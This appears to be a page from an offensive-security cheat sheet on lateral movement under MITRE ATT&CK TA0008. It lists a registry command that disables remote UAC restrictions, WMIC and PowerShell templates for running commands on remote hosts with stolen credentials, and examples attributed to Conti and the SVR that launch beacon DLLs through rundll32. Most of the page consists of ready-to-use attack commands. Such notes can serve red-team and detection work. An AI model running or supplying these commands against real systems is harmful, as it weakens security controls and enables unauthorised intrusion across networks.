Lateral Movement

The adversary is trying to move through your environment. https://attack.mitre.org/tactics/TA0008/

Disable Remote UAC Restrictions

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

WMIC

Source: https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework

WMI allows users with the required privileges to execute commands in remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. Adversaries used the following commands to execute commands in a remote host.

wmic /node:<remote_ip> /user:<username> /password:<password> process call create cmd.exe /c "<command>"

Or, with PowerShell:

Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>

Conti TTP

wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"

Russian Foreign Intelligence Service (SVR) TTP

wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"

PreviousImpact NextPersistence

Last updated 4 months ago